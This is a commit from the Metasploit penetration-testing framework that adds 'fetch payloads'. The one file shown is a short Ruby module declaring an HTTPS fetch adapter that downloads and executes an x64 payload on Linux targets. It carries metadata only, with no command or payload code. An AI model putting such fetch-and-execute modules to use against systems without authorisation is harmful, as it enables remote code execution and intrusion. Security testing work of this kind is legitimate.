Add fetch payloads for Windows and Linux x64

This commit is contained in:
bwatters
2023-03-15 19:19:19 -05:00
parent b052386700
commit 548a2d7ab4
22 changed files with 1211 additions and 14 deletions
@@ -0,0 +1,25 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
include Msf::Payload::Adapter::Fetch::Https
include Msf::Payload::Adapter::Fetch::LinuxOptions
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HTTPS Fetch',
'Description' => 'Fetch and Execute an x64 payload from an https server',
'Author' => 'Brendan Watters',
'Platform' => 'linux',
'Arch' => ARCH_CMD,
'License' => MSF_LICENSE,
'AdaptedArch' => ARCH_X64,
'AdaptedPlatform' => 'linux'
)
)
end
end